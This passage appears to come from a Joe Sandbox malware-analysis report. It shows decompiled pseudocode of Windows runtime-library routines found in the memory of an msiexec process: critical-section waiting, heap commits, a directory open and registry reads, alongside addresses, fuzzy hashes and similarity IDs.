						_t64 = E04D49520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04D3E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04D5DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4df6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4df6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04D49980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04D495D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04D27D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04D27D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04D87016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04D9FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4df5350;
							if(_t109 != 0x4df5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04D9FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04D95720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                              0x04d02d8a
                              0x04d02d8a
                              0x04d02d92
                              0x04d02d96
                              0x04d02d9e
                              0x04d02da0
                              0x04d02da3
                              0x04d02da5
                              0x04d02da8
                              0x04d02dab
                              0x04d02db2
                              0x04d5f9aa
                              0x04d5f9ab
                              0x04d5f9ae
                              0x04d5f9ae
                              0x04d02db8
                              0x04d02dc2
                              0x04d5f9b9
                              0x04d5f9be
                              0x04d5f9bf
                              0x04d5f9bf
                              0x04d02dcf
                              0x04d5f9c9
                              0x04d02dd5
                              0x04d02dd5
                              0x04d02dd5
                              0x04d02dde
                              0x04d02de1
                              0x04d02e70
                              0x04d02e72
                              0x04d02e72
                              0x04d02de7
                              0x04d02deb
                              0x04d02e7c
                              0x04d02e83
                              0x04d02e85
                              0x04d02e8b
                              0x04d02e8d
                              0x04d02e92
                              0x04d02e92
                              0x04d02e85
                              0x04d02df1
                              0x04d02df7
                              0x04d02df9
                              0x04d02df9
                              0x04d02dfc
                              0x04d02dff
                              0x04d02e02
                              0x00000000
                              0x04d02e05
                              0x04d02e0c
                              0x04d5f9d9
                              0x04d02e12
                              0x04d02e12
                              0x04d02e12
                              0x04d02e1a
                              0x04d5f9e3
                              0x04d5f9e9
                              0x04d5f9f0
                              0x04d5f9f6
                              0x04d5f9f8
                              0x04d5f9f8
                              0x04d5f9f0
                              0x04d02e23
                              0x04d5fa02
                              0x04d5fa03
                              0x04d5fa05
                              0x04d5fa06
                              0x00000000
                              0x04d02e29
                              0x04d02e29
                              0x04d02e2e
                              0x04d02e34
                              0x04d02e3e
                              0x00000000
                              0x00000000
                              0x04d02e44
                              0x04d02e47
                              0x04d02e4d
                              0x00000000
                              0x00000000
                              0x04d02e4f
                              0x04d02e54
                              0x00000000
                              0x00000000
                              0x04d02e5a
                              0x04d02e5f
                              0x04d02e9a
                              0x04d02ea4
                              0x04d02ea5
                              0x04d02ea8
                              0x04d02eaf
                              0x04d02eb2
                              0x04d02eb5
                              0x04d5fae9
                              0x04d5faeb
                              0x04d5faed
                              0x04d5faef
                              0x04d5faf7
                              0x04d5faf8
                              0x04d5fafd
                              0x04d5faff
                              0x04d5fb04
                              0x04d5fb04
                              0x04d5faff
                              0x04d02ec0
                              0x04d02ec4
                              0x04d02ec6
                              0x04d02ec8
                              0x04d5fb14
                              0x04d5fb18
                              0x04d5fb1e
                              0x04d5fb21
                              0x04d5fb21
                              0x04d02ece
                              0x04d02ece
                              0x04d02ece
                              0x04d02ed7
                              0x04d02e61
                              0x04d02e63
                              0x04d5fa6b
                              0x04d5fa71
                              0x04d5fa76
                              0x04d5fa78
                              0x04d5fa8a
                              0x04d5fa7a
                              0x04d5fa83
                              0x04d5fa83
                              0x04d5fa8f
                              0x04d5fa91
                              0x04d5fa97
                              0x04d5fa9d
                              0x04d5faa4
                              0x04d5faaa
                              0x04d5faaf
                              0x04d5fab1
                              0x04d5fac3
                              0x04d5fab3
                              0x04d5fabc
                              0x04d5fabc
                              0x04d5fac8
                              0x04d5facb
                              0x04d5fadf
                              0x04d5fadf
                              0x04d5facb
                              0x04d5faa4
                              0x04d5fa91
                              0x04d02e6f
                              0x04d02e6f
                              0x04d02e5f
                              0x04d5fa13
                              0x04d5fa15
                              0x04d5fa17
                              0x04d5fa1f
                              0x04d5fa21
                              0x04d5fa22
                              0x04d5fa25
                              0x04d5fa28
                              0x04d5fa2f
                              0x04d5fa2f
                              0x04d5fa2a
                              0x04d5fa2a
                              0x04d5fa2a
                              0x04d5fa31
                              0x04d5fa34
                              0x04d5fa36
                              0x04d5fa3c
                              0x04d5fa3e
                              0x04d5fa41
                              0x04d5fa43
                              0x04d5fa45
                              0x04d5fa45
                              0x04d5fa41
                              0x04d5fa3c
                              0x04d5fa4a
                              0x04d5fa4f
                              0x04d5fa51
                              0x04d5fa53
                              0x04d5fa56
                              0x04d5fa5b
                              0x04d5fa5e
                              0x00000000
                              0x04d5fa5e
                              0x04d02e23

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: RTL: Re-Waiting
                              • API String ID: 0-316354757
                              • Opcode ID: b9a4d410d830bac4da788a6bcc1112e83c9c3666ed5a25f87c7e5bf245c141bf
                              • Instruction ID: 5e2899c076c65073a6ee877cd9e1a688c249a377e1a7197f54556aba72074cef
                              • Opcode Fuzzy Hash: b9a4d410d830bac4da788a6bcc1112e83c9c3666ed5a25f87c7e5bf245c141bf
                              • Instruction Fuzzy Hash: 96612431B01604ABEF31DF68C888B7E77A5FB41318F1446AAD851DB2D1DB74BD0187A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                              Download Yara Rule
                              C-Code - Quality: 80%
                              			E04DD0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04DCFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04DD1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04D49730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04DCA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04DCA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4df8b04 >> 0x14) + (_v44 -  *0x4df8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04D27D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04DC138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04D27D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04DBFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4df8724 & 0x00000008) != 0) {
						E04DC52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04DD15B5(0x4df8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                              0x04dd0eb7
                              0x04dd0eb9
                              0x04dd0ec0
                              0x04dd0ec2
                              0x04dd0ecd
                              0x04dd105b
                              0x04dd105b
                              0x04dd1061
                              0x04dd1066
                              0x04dd1066
                              0x04dd106b
                              0x04dd1073
                              0x04dd1073
                              0x04dd0ed3
                              0x04dd0ed6
                              0x04dd0edc
                              0x04dd0ee0
                              0x04dd0ee7
                              0x04dd0ef0
                              0x04dd0ef5
                              0x04dd0efa
                              0x04dd0efc
                              0x04dd0efd
                              0x04dd0f03
                              0x04dd0f04
                              0x04dd0f06
                              0x04dd0f07
                              0x04dd0f09
                              0x04dd0f0e
                              0x04dd0f14
                              0x04dd0f23
                              0x04dd0f2d
                              0x04dd0f34
                              0x04dd0f34
                              0x04dd0f14
                              0x04dd0f52
                              0x00000000
                              0x00000000
                              0x04dd0f58
                              0x04dd0f73
                              0x04dd0f74
                              0x04dd0f79
                              0x04dd0f7d
                              0x04dd0f80
                              0x04dd0f86
                              0x04dd0fab
                              0x04dd0fb5
                              0x04dd0fc6
                              0x04dd0fd1
                              0x04dd0fe3
                              0x04dd0fd3
                              0x04dd0fdc
                              0x04dd0fdc
                              0x04dd0feb
                              0x04dd1009
                              0x04dd1009
                              0x04dd1015
                              0x04dd1027
                              0x04dd1017
                              0x04dd1020
                              0x04dd1020
                              0x04dd102f
                              0x04dd103c
                              0x04dd103c
                              0x04dd1048
                              0x04dd1050
                              0x04dd1050
                              0x04dd1055
                              0x00000000
                              0x04dd1055
                              0x04dd0f88
                              0x04dd0f9e
                              0x04dd0fa2
                              0x04dd0fa9
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04dd0fa9
                              0x00000000

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: `
                              • API String ID: 0-2679148245
                              • Opcode ID: 874ab1097e2ada336d63768470d3bf3699aadda3e69a579a0b9fcb2f23cdfcf4
                              • Instruction ID: 037ff111ffc29e90920e2bc510db1181a27a2c5491065c47d1527ac8075c2087
                              • Opcode Fuzzy Hash: 874ab1097e2ada336d63768470d3bf3699aadda3e69a579a0b9fcb2f23cdfcf4
                              • Instruction Fuzzy Hash: 90516A713083429FE325EF28D984B2BB7E5EBC4708F144A2DF99697291D671F805CB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E04D3F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04D24120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04D49830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04D49990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04D495D0();
							goto L11;
						} else {
							_t109 = L04D24620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E04D4F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04D495D0();
										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                              0x04d3f0d3
                              0x04d3f0d9
                              0x04d3f0e0
                              0x04d3f0e7
                              0x04d3f0f2
                              0x04d3f0f4
                              0x04d3f0f8
                              0x04d3f100
                              0x04d3f108
                              0x04d3f10d
                              0x04d3f115
                              0x04d3f116
                              0x04d3f11f
                              0x04d3f123
                              0x04d3f124
                              0x04d3f12c
                              0x04d3f130
                              0x04d3f134
                              0x04d3f13d
                              0x04d3f144
                              0x04d3f14b
                              0x04d3f152
                              0x04d7bab0
                              0x04d7bab0
                              0x04d3f158
                              0x04d3f158
                              0x04d3f15a
                              0x04d3f160
                              0x04d3f165
                              0x04d3f166
                              0x04d3f16f
                              0x04d3f173
                              0x04d7baa7
                              0x04d7baa7
                              0x04d7baab
                              0x00000000
                              0x04d3f179
                              0x04d3f18d
                              0x04d3f191
                              0x04d7baa2
                              0x00000000
                              0x04d3f197
                              0x04d3f19b
                              0x04d3f1a2
                              0x04d3f1a9
                              0x04d3f1af
                              0x04d3f1b2
                              0x04d3f1b6
                              0x04d3f1b9
                              0x04d3f1c4
                              0x04d3f1d8
                              0x04d3f1df
                              0x04d3f1e3
                              0x04d3f1eb
                              0x04d3f1ee
                              0x04d3f1f4
                              0x04d3f20f
                              0x04d7bab7
                              0x04d7babb
                              0x04d7bacc
                              0x04d7bad1
                              0x04d3f215
                              0x04d3f218
                              0x04d3f226
                              0x04d3f22b
                              0x00000000
                              0x04d3f22b
                              0x04d3f1f6
                              0x04d3f1f6
                              0x04d3f1f9
                              0x04d3f1fb
                              0x04d3f1fb
                              0x04d3f1f4
                              0x04d3f191
                              0x04d3f173
                              0x04d3f152
                              0x04d3f203

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                              • Instruction ID: 95debcb1a89be07c268f00408ccc05179144c5d019bc8a94c8d77a462235d0e9
                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                              • Instruction Fuzzy Hash: 125180716047149FD321DF29C840A67BBF4FF88714F108A2EF99597650E7B4E914CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D83540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E04D83540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4dfd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04D40BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04D83706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04D4FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04D83540;
						E04D4FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04D5DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04D90C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04D497C0();
					}
					return E04D4B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04D83971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04D83884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04D4FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04D49650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04D83787(_a4,  &_v352, _t80);
						}
					}
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04D495D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                              0x04d83552
                              0x04d8355a
                              0x04d8355d
                              0x04d83566
                              0x04d83567
                              0x04d8357e
                              0x04d8358f
                              0x04d835a1
                              0x04d835a5
                              0x04d8366b
                              0x04d8366b
                              0x04d8366d
                              0x04d83672
                              0x04d83679
                              0x04d83685
                              0x04d8368d
                              0x04d8369d
                              0x04d836a7
                              0x04d836b8
                              0x04d836c6
                              0x04d836c7
                              0x04d836dc
                              0x04d836e1
                              0x04d836e7
                              0x04d836e9
                              0x04d836e9
                              0x04d83703
                              0x04d83703
                              0x04d835b5
                              0x04d835c0
                              0x04d835c4
                              0x00000000
                              0x00000000
                              0x04d835ca
                              0x04d835d7
                              0x04d835e2
                              0x04d835e6
                              0x04d835e8
                              0x04d835f5
                              0x04d835fa
                              0x04d83603
                              0x04d83604
                              0x04d83609
                              0x04d8360a
                              0x04d83612
                              0x04d83613
                              0x04d8361e
                              0x04d83622
                              0x04d83628
                              0x04d8362f
                              0x04d8362f
                              0x04d83636
                              0x04d83638
                              0x04d8363b
                              0x04d83642
                              0x04d83642
                              0x04d83636
                              0x04d83657
                              0x04d83657
                              0x04d8365c
                              0x04d83662
                              0x04d83669
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: BinaryHash
                              • API String ID: 0-2202222882
                              • Opcode ID: dc32268d399693c0d52c645066971c98ea0fc20ee3b9a74cac50f79638e4aae0
                              • Instruction ID: 41027b0c3a9c719af482c3d4f3af32632f47de98ee1428b2dd76cc28fd34c10d
                              • Opcode Fuzzy Hash: dc32268d399693c0d52c645066971c98ea0fc20ee3b9a74cac50f79638e4aae0
                              • Instruction Fuzzy Hash: B3411BF1D0151C9BEB21EB54CC45FAEB77CEB44718F004599EA0967250DB31AE488FA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                              Download Yara Rule
                              C-Code - Quality: 71%
                              			E04DD05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E04DD07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04D49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E04DCA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E04DCA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E04DD1293(_t79, _v40, E04DD07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04D27D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E04DC138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                              0x04dd05c5
                              0x04dd05ca
                              0x04dd05d3
                              0x04dd06db
                              0x04dd06db
                              0x04dd06dd
                              0x04dd06e3
                              0x04dd06e3
                              0x04dd05dd
                              0x04dd05e7
                              0x04dd05f6
                              0x04dd0600
                              0x04dd0607
                              0x04dd0610
                              0x04dd0615
                              0x04dd061a
                              0x04dd061c
                              0x04dd061e
                              0x04dd0624
                              0x04dd0625
                              0x04dd0627
                              0x04dd0628
                              0x04dd0631
                              0x04dd0640
                              0x04dd064d
                              0x04dd0654
                              0x04dd0654
                              0x04dd0631
                              0x04dd066d
                              0x04dd0674
                              0x00000000
                              0x00000000
                              0x04dd0692
                              0x04dd069e
                              0x04dd06b0
                              0x04dd06a0
                              0x04dd06a9
                              0x04dd06a9
                              0x04dd06b8
                              0x04dd06d6
                              0x04dd06d6
                              0x00000000

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: `
                              • API String ID: 0-2679148245
                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                              • Instruction ID: 142a66fbf2a584edad4f991c62542b2b6eeafa29e7cf950db3eeb4d0aeb03eca
                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                              • Instruction Fuzzy Hash: 2331B132704355ABE721DE25CD85F9B7BD9FBC4758F044229F958AB280E670F904CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D83884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                              Download Yara Rule
                              C-Code - Quality: 72%
                              			E04D83884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04D49650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
